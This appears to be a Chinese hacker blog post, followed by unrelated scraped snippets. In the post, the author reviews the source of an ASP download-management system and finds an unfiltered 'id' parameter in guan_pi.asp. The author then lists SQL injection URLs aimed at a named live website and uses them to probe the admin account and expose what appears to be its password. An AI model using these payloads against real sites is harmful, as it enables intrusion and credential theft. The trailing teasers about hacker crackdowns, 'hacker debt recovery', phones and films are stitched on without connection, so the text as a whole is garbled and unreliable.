看了N.E.V.E.R写的很多关于sql injection的文章后,很有感触,真佩服他能耐心看得下那么多的代码,并能发现那么多的漏洞。在他的感染下,我也试着看一些代码,复杂的代码不看,我看些简单的:先看看书生下载管理系统吧,我看的是5.5版的,应该是最新版的吧。我也来”倒“着看(实际上是在床上看),哈哈~~ ^-^先看看soft.asp吧,看这个dim zhuid,typeid,types,zhuid = Request.QueryString("id")if id="" or not IsNumeric(id) thenResponse.Write("错误参数")Response.Endelse好象对id过滤很严哦反正我从这里是下不了手的,主要是因为我很笨!后来看着看着就睡着了,醒来后,突然眼睛一亮发现一个guan_pi.asp文件,里面是这样写的dim sql,rsdim tempdim idim idid=request("id")set rs=server.createobject("adodb.recordset")sql="select review,title,reviewcount from learning where articleid="&idrs.open sql,conn,1,1%>用never的话说,这是最垃圾的写法。对id没有做任何过滤哈哈,看样子有戏了!提交:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1) ---------对此站点的管理员持抱歉态度接下来应该是最熟悉的:http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20name='admin')http://www.jing0.com/down/guan_pi.asp?ID=(select%20count(*)%20from%20password%20where%20id=1%20and%20password='19831112.520') ---这个密码挺有意思的,典型的中国密码 我想找找官方网站,好象打不开,就算了,以后再去找吧。恩,继续睡觉
新闻记者21日从广东省公安厅获知,前不久,在国家公安部的指引融洽下,广东省公安厅进行“清网安网”15号严厉打击黑客黑客攻击毁坏违法违纪专项整治,破获黑客类案子100余宗,取得成功做掉黑客犯罪团伙30多...
黑客漏洞怎么找相关问题 黑客技术自学教程手机相关问题 怎么能进入捷信黑客 黑客追款有成功的没有(黑客大户追款)...
现在的形式下要问什么行业前景好?那当属网络直播,因为它的崛起确实造就了一批有钱人,也让更多普通人看到了希望,那不熟悉网络直播的人可能不知道它是怎么赚钱的?下面我们就来介绍下。 有哪些途...
诺基亚X6好一些啊,3G手机智能手机拍照手机音乐手机时尚手机于一体的它,可以说是诺基亚触屏手机的里程杯,500W像素,双LED补光灯, 别听网上瞎说,N86外放可以,买N86吧,绝不后悔,价钱稍微高点...
本文导读目录: 1、求 黑客帝国2:重装上阵 百度网盘免费资源链接,谢谢 2、黑客帝国2 . 3 在哪能 免费观看 全集啊 最好是高清 3、网上那里可以看黑客帝国2 4、黑客帝国2:重装上...
十有八九,生活是不开心的,因此 大家一直更不满意。大家的成就感有二种,一种是对自身的,另一种是对外部的。我们不能操纵世界有多大。当我们无法阻拦的情况下,世界有多大常常使我们不高兴。比如,在我们下班...